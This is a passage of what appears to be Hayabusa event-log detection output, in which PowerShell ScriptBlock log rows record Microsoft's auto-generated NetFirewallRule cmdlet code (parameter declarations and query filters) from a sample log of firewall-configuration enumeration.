-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAl",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"l')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 